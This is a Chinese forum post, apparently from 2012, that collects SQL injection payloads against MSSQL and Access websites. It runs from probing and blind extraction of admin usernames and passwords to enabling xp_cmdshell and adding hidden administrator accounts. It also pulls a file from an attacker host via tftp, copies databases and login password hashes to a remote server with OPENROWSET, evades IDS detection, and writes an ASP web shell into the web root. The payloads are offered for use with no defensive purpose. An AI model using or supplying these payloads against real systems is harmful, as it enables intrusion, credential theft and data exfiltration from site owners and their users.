1..判断有无注入点
( N- Y7 J4 v* H r% }; and 1=1 and 1=2 ; b$ \8 G; F+ `% N: n4 ^# m P
- |3 r& l2 `4 e, _
& ^$ ]4 Q ~ I" d2.猜表一般的表的名称无非是admin adminuser user pass password 等..
/ y- D2 J) }6 I" [and 0<>(select count(*) from *)
! c1 x" z* t0 a+ m: W3 kand 0<>(select count(*) from admin) ---判断是否存在admin这张表
2 h& K9 K. F% t; P. J$ S$ U# b1 @. s. C9 f# }; M
, \& J1 a, `9 u5 _+ c2 h4 b3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 % y' F3 z7 U1 l: l0 W) k" n
and 0<(select count(*) from admin) 4 {1 t$ J" L. m$ ]
and 1<(select count(*) from admin)
$ o6 o1 T0 M- i3 r$ o1 T猜列名还有 and (select count(列名) from 表名)>0
$ t4 e" z* W5 x* s0 n. m6 T2 o; q3 b; H0 t. x
# y/ |3 o" c8 V7 M4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
: S; l9 I6 g( b7 X7 r4 M' Sand 1=(select count(*) from admin where len(*)>0)-- # R& f; m% S7 s+ ]$ L+ d c0 x
and 1=(select count(*) from admin where len(用户字段名称name)>0)
% S1 M2 O' L6 z. K# Hand 1=(select count(*) from admin where len(密码字段名称password)>0) 5 M g2 }9 H2 H$ Z Y: v* t
+ x) q, C1 U/ s& j, H: {; A+ O6 h
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 & f. [! l6 o6 d2 ]9 I
and 1=(select count(*) from admin where len(*)>0)
( B# e, [% Q) v& G( k/ _' cand 1=(select count(*) from admin where len(name)>6) 错误
7 t3 Q' y1 k, e) u2 p: y) |9 aand 1=(select count(*) from admin where len(name)>5) 正确 长度是6 : A/ z& B5 s$ @' L0 l7 Y
and 1=(select count(*) from admin where len(name)=6) 正确
; ~/ o. j6 E5 P+ d% K% S; ^- S9 Q0 |+ U& ]# F- t( N
and 1=(select count(*) from admin where len(password)>11) 正确
# r% _0 w3 K6 U) W4 A: \" \7 M5 s8 [and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 ( g2 m! _6 Q7 x; J1 O
and 1=(select count(*) from admin where len(password)=12) 正确 . [/ S9 B j# g! \# a# p
猜长度还有 and (select top 1 len(username) from admin)>5- k0 k7 z$ Z) S4 m# l, s7 ?
% C6 [1 f: ]3 g* v; f6 u" `
' g; E1 v- B7 M6.猜解字符 . N# u* Z1 e. L, p: q; _
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 , |2 B, F1 v8 E$ N! t
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
. c9 a2 U! q; n$ ?4 ^) t' S就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
' e/ f! p, { L/ H" n- V& R3 l3 c/ Z$ j
猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算' s% { R: N4 U
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 7 `& B6 F# U1 O0 O5 `
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. 8 t8 U2 K+ v9 l O
, e7 ~* b# j2 K3 k2 P; R+ P' dgroup by users.id having 1=1--
' w* y$ q- G Q/ Pgroup by users.id, users.username, users.password, users.privs having 1=1-- ( e) f- P1 h: V2 x) e# e& e
; insert into users values( 666, attacker, foobar, 0xffff )--
6 s# Z5 \$ s+ V/ v+ \- Q1 T* ~& T- W! h& K) r4 Q' a& x, P
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
; i0 X% z+ s. {2 b0 R }UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- 1 J5 e; @1 z, H- c& \
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- - E" u6 s& a! d3 _7 v
UNION SELECT TOP 1 login_name FROM logintable- 1 A6 t. D* \$ y8 s3 x) L# i; H6 T7 \5 B
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
8 _4 X$ I% o2 i+ D9 A" K5 Q z) [6 w; t2 A K- t1 K' ^$ s
看服务器打的补丁=出错了打了SP4补丁 ) U0 l) T, T8 L3 S5 s9 c5 ~
and 1=(select @@VERSION)--
3 O: H+ }2 g6 f6 {" M+ i( l# U; j1 o5 w& m
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 & E2 K3 ~3 |' L5 Q, V
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- $ \8 v1 L* L* q: \
$ m4 j \/ D% ?7 r判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) + G, t2 }4 [' ]! u8 d" Y
and sa=(SELECT System_user)-- 0 f. H* c( L+ \8 K7 Y( `2 P: m
and user_name()=dbo--
3 f8 j: E& c8 e. U+ {and 0<>(select user_name()--
( {& X( [0 _& ]1 a) h* B
, W# B$ o4 q/ y看xp_cmdshell是否删除
/ C, d. {% C3 Gand 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)-- ! j4 G+ [' C# y! E8 i
" v* d5 f9 g' S. k+ axp_cmdshell被删除,恢复,支持绝对路径的恢复
, R; Y" ^8 R9 P- S& f1 U;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
3 c1 r0 ^6 S* @& c. x;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- ' J8 ?. \6 b. m$ W8 X3 t
( o2 r& O; K3 o( y
反向PING自己实验
1 l: W( a5 v" ? V2 Q/ I;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
2 ?; h* i8 J, ]3 @; Q' @
' H0 Y" ], d" {加帐号 ( i0 \) Y& n" N; H3 I. M
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
( v k9 k) T; N1 H: n1 S' w+ [7 B; o5 e: P# j+ ~; P% R) `
创建一个虚拟目录E盘:
2 [# w5 _8 f' B7 Y+ ]9 c8 e;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- ) }, h5 Q$ u+ v7 E2 S& H
3 B4 V$ t. z( A6 I: N/ E6 L4 T访问属性:(配合写入一个webshell) 8 c4 \/ }2 S I/ G! {
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
% L. Z K4 w; [, q. U3 R1 W
4 N; T# x- l/ R
9 K. l2 @% s4 G, vMSSQL也可以用联合查询
: `3 D3 M/ X1 a( c$ l2 ~?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin / ^6 Y0 R5 S# e- x6 n3 Q( w4 O
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
h% E9 R2 ^! I
, E8 E8 {* {! K, ~2 V9 U9 s
: `% x w+ X7 T0 P, s/ A$ ]爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 ' X( Q' h# l+ K! l6 L$ j
% g4 D$ d0 P' j) l( K" N
- G* t# O+ `5 [, z$ ?
( P. z- h5 z8 f) ?, ]1 C得到WEB路径 b7 q8 D5 X9 P. M- o7 |. @6 r# }
;create table [dbo].[swap] ([swappass][char](255));-- # w0 ~ A3 h, a9 H& N
and (select top 1 swappass from swap)=1-- 1 O( H9 U$ a6 k0 g) h! X" w0 J
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- / _( `1 t' @# \
;use ku1;-- i$ W+ k8 d# q1 j- A. R) A
;create table cmd (str image);-- 建立image类型的表cmd
& X% C W; p- ]( ^% u; I) e8 @& B/ D/ h
存在xp_cmdshell的测试过程: 9 J! T9 m4 o7 I) ^' k; v
;exec master..xp_cmdshell dir . S$ u0 p2 f3 }
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
$ @% w! Z6 E- w;exec master.dbo.sp_password null,jiaoniang$,1866574;--
/ ]3 x4 ~; s8 ?0 R;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- 8 E1 R( w' B$ c/ I4 G8 p/ i' I j" s. ?
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
7 Q8 f$ g# R4 _0 `- q. H;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
( _9 F: K8 S" Y2 S) pexec master..xp_servicecontrol start, schedule 启动服务 1 S3 X5 Z! v9 b# F/ s% [
exec master..xp_servicecontrol start, server 2 [6 w% ^4 @! G( z1 D4 S; W+ H$ J
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
: ^9 b, r0 B& W0 R0 R9 j4 W;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add ) I* `$ L6 E8 S# j* P( O; m" X
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 $ q% N# _) x( y% j+ z7 Y
+ u+ h, u- l3 S& j;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ . T2 Y. z% A. G$ }
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
9 P& e2 b2 q# \;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat 5 I- V6 U+ z2 b# `
如果被限制则可以。
7 e2 a; L$ W, Iselect * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax) $ I# U' h( P: {. D: D
- q. M6 G5 Z2 i# a0 ] ?
查询构造:
: N5 m; h4 j2 }) RSELECT * FROM news WHERE id=... AND topic=... AND ..... 5 k. |9 ?- z/ y# Z2 w# _4 y2 [
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 8 k1 T0 V+ `5 B! V$ _1 [4 X9 n) Y4 s
select 123;--
; t1 O* F6 K2 B g9 q5 p6 Y! ];use master;--
0 Z* O8 R- C7 R9 l:a or name like fff%;-- 显示有一个叫ffff的用户哈。
( x$ U) I9 S+ {* r. ~and 1<>(select count(email) from [user]);-- % u6 B' w9 H" z7 ~
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
& ]0 _4 |' s# E$ K1 f;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;-- . f2 f7 Q4 R. c5 g
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
5 d/ Z8 _3 }9 F7 n' w;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
( Z5 B/ R0 l9 J1 z# O+ P;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
: b. g9 Z& ]( w1 Z2 i4 Z8 [2 g* c0 D0 q( ~;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
! X% G8 R- m4 O& ?2 X5 j1 U5 F上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
4 s2 j5 M" E; K# I. Q通过查看ffff的用户资料可得第一个用表叫ad
, C5 t" A. O( w" I2 T! P然后根据表名ad得到这个表的ID 得到第二个表的名字
) J, W) K! l( h$ A# V" r7 z5 k/ g S4 p1 b
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- & W7 i, C g; X, D, m
insert into users values( 667,123,123,0xffff)-- : i, {% y& L6 y1 v
insert into users values ( 123, admin--, password, 0xffff)-- ; T' A. N& n7 e9 P# u
;and user>0
" b+ H6 s7 U& p/ y- X;and (select count(*) from sysobjects)>0 3 X2 E1 x/ A+ X
;and (select count(*) from mysysobjects)>0 //为access数据库
8 \' g b; X. G# I& ~3 r0 B' Z. ?; K! H7 H( g% z' A
枚举出数据表名
. f6 `6 D! w& V7 i/ A; L;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
" Z. l) d! J6 d% s. h4 D2 w这是将第一个表名更新到aaa的字段处。
8 E7 X* f( ~- y3 i, j读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 1 i! m4 w) p1 |1 M @4 ]& v3 s
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
5 f# l; R0 _0 q! c& F7 Z然后id=1552 and exists(select * from aaa where aaa>5) 7 e& X, f& g: s7 g. w
读出第二个表,一个个的读出,直到没有为止。 ; j( o! M- u" T: U8 {
读字段是这样: : t7 \7 g/ F" [$ V; m e* P! B
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
) F1 c5 O6 g$ _' K: l然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
+ s3 F e" r, X( Y( p9 s8 ^. H( |;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
6 s+ E6 g0 P% S4 e( m然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 " o" c2 E4 u I2 l& k
' o9 w# b5 W1 }[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
C5 c6 M( N0 j& e; M, Supdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
( N( ~# P. z5 E通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
# x. Y+ C5 Y/ d: Y( f$ W% O z( G8 [8 n, a
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
1 z( i& U. }9 w( }% _3 Lupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] . R& X$ n5 J( u3 s/ h
4 Y1 | {+ }- A/ l: Z9 ~1 |绕过IDS的检测[使用变量] % ^! w# V! t& j4 T
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
. a1 I7 I" ]0 Y. `0 v;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ & p/ V; x; D% ~9 D2 W
5 f7 v- H7 v2 d# V i' A+ o: W: \
1、 开启远程数据库
& G+ C. A$ X$ X9 `- U基本语法
3 i$ o1 Q( y* }" l+ f/ a- Yselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) : \3 U6 z1 N6 B: ~) M* j
参数: (1) OLEDB Provider name 0 t% s7 s) Y9 m Z& m
2、 其中连接字符串参数可以是任何端口用来连接,比如
' {# j8 k8 w( S! w9 J$ Qselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
3 K. R. ]; x- u# r; b$ A1 P; o3.复制目标主机的整个数据库insert所有远程表到本地表。 $ z* I$ W# m: B: {6 m" ?' _* G
/ u/ I3 q/ J8 Z* F$ q( J
基本语法:
. l$ W' P; }) M7 e- Uinsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 " P: W5 t6 F. Y% ^
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: : G8 Y8 `: G3 J% y$ r
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 : x! j" O+ U( M4 S1 i
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
+ @1 I* C& z3 Y$ Zselect * from master.dbo.sysdatabases
8 [2 p5 x/ m2 Binsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
; Y! k* f" m. pselect * from user_database.dbo.sysobjects % Y5 C& @8 S+ N3 w N% e6 G4 C
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) 9 `) l0 h. ~9 M7 S' y2 X& U
select * from user_database.dbo.syscolumns ! G9 q8 z% q# R) B$ u
复制数据库: & \* M; F5 B% S1 K$ d
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 2 A' i0 X& ]1 d, ]
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
9 I4 E4 D( ~; t& G
, J8 y2 V: U# j复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下:
9 e- w9 t7 U' F/ H* j6 finsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins 5 H2 z* d0 b4 V4 }% a g
得到hash之后,就可以进行暴力破解。 ( G- U- a; k! s& L& w7 P7 c
6 f7 }+ H/ ~' N* Q5 U1 g8 f% Y5 a遍历目录的方法: 先创建一个临时表:temp - Q. v5 X& d# O8 \* p/ L- l% K
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ( N- P) A }7 V# ] ^/ l; b
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 $ j5 ]' N9 F, ^$ ? T9 r
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
I* Z" e: }# Z$ Z% ?8 g0 F' [0 w;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
+ s8 `. y" ^( m1 R6 S9 I2 Y;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
7 e+ x5 a& P0 {4 P2 B8 Y$ u1 {;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
9 n: C, R- K2 ~ o;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
& O+ o( E( q; R" J% {;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc 1 [& s8 u# w+ @2 E! ^
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
, Z) |% F! M6 H写入表: / f0 z* u( u1 R& J% @
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
, {- ?5 N) |. M0 i+ @7 y语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));-- " p: u. W; G- i5 D" E; T: E
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
' v+ D$ C, U0 d: {语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
+ J. x6 a Z# V; A2 h1 _# l语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 1 L5 V' n* ?9 |% ]# c8 @
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- ( p7 I1 d* {* f2 \
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
- ?; O" M2 n. B" C' X语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- . ?0 B% r, B3 M7 m$ O
语句9:and 1=(SELECT IS_MEMBER(db_owner));--
0 ~$ E4 b/ R2 z+ h* D
4 |) p# C2 d2 y/ W6 s$ m, B' }6 `把路径写到表中去:
& C, i {6 Q5 i; O6 D9 ^: ]0 |;create table dirs(paths varchar(100), id int)--
+ {& S! d0 {$ ?4 e5 N3 g;insert dirs exec master.dbo.xp_dirtree c:\-- : j5 R: f$ e( K; b$ k; E
and 0<>(select top 1 paths from dirs)-- # h# {, z! h! P
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
' ^% \7 V% V2 b1 D) V;create table dirs1(paths varchar(100), id int)-- 8 `: R' F/ t; E. s9 N
;insert dirs exec master.dbo.xp_dirtree e:\web--
* n4 v# k, j4 P9 k8 Uand 0<>(select top 1 paths from dirs1)--
2 V3 ?' k3 b" n
* B# L; W: Z m' t, W+ A- n把数据库备份到网页目录:下载 & x0 ]3 X8 G; L! l0 G
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
& [- L. x8 h, P) C- X0 [; J3 Z, U( w3 z( `
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
5 t; c+ @5 b3 [+ X4 jand 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
6 x- h( w% |* W9 f6 cand 1=(select user_id from USER_LOGIN) & O4 b4 P( _8 F/ m2 K( h
and 0=(select user from USER_LOGIN where user>1) ) ^0 l9 w8 S. r6 @
2 y. M1 B- H) T, \$ {& ^0 \
-=- wscript.shell example -=-
3 n& ~: m# c6 X. X0 Jdeclare @o int
+ O1 \( w& D0 U7 P6 J5 K9 Texec sp_oacreate wscript.shell, @o out 7 h1 w8 ^) s$ g. y( ~9 {
exec sp_oamethod @o, run, NULL, notepad.exe
" k( ?0 W. {1 H; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
) E( @7 a1 R* ]+ p4 T3 u& u$ p) j3 M+ U( r9 M5 G4 ~3 E" s
declare @o int, @f int, @t int, @ret int
. N" \( m& W6 n% b5 F+ ^/ sdeclare @line varchar(8000) : |8 H. |& l- n5 n! h# i
exec sp_oacreate scripting.filesystemobject, @o out 0 I5 y% c% g8 e) P7 X$ i: O. Z
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 1 K1 a1 N; @8 W2 _0 h% E
exec @ret = sp_oamethod @f, readline, @line out
# ~. Z3 R: v v4 o1 K9 ]while( @ret = 0 ) 5 u2 I8 Z" C7 Q) Q# [6 _
begin 3 W# g, f6 Z! s9 z7 |1 s! s
print @line 4 H: k" z9 I) x. |
exec @ret = sp_oamethod @f, readline, @line out , e) T! S, T; q) {: ?& I6 x
end & ^* I i1 ^" a, X
3 B6 R' `0 ? d; M% |' w
declare @o int, @f int, @t int, @ret int
' a+ G0 _8 `' ]2 p* k+ iexec sp_oacreate scripting.filesystemobject, @o out
) C: x6 j0 y4 r& ^) D/ ~/ ^4 Gexec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
5 G* M& a: S+ ]exec @ret = sp_oamethod @f, writeline, NULL, % L' a# y* W2 |# W+ M
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
5 C9 H/ E' u; V" p7 |
3 n s8 v% n& Z) t, b {; T6 D+ tdeclare @o int, @ret int , k8 j. `3 S3 i- a. f
exec sp_oacreate speech.voicetext, @o out
. g$ Q: i7 o! |8 G7 b( B% Texec sp_oamethod @o, register, NULL, foo, bar
. _ Z. }* }9 l( {" R) o# S4 T( Wexec sp_oasetproperty @o, speed, 150 m6 v& W( @2 P$ Y
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
) X+ X B5 V9 F/ L. K1 [9 F0 ywaitfor delay 00:00:05 - v7 j( ^$ o$ ]' v3 N/ ]8 O: r0 {
9 v6 _1 ?8 m: c9 o6 u
; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
1 R8 J& h5 I7 r1 w7 z+ Y/ M7 v& H& Y) n0 F q! z$ J* \1 W7 W; }
xp_dirtree适用权限PUBLIC % e& B U, W6 N% g" h7 k# C
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。 9 f+ G! Q9 A! H# d$ p' K
create table dirs(paths varchar(100), id int) 3 J1 I7 n) {# @
建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。
1 s3 l- G9 h" `insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
8 {# `6 t5 n2 |- R9 W3 z |
发表于 2012-9-15 14:32:40
收藏
支持
反对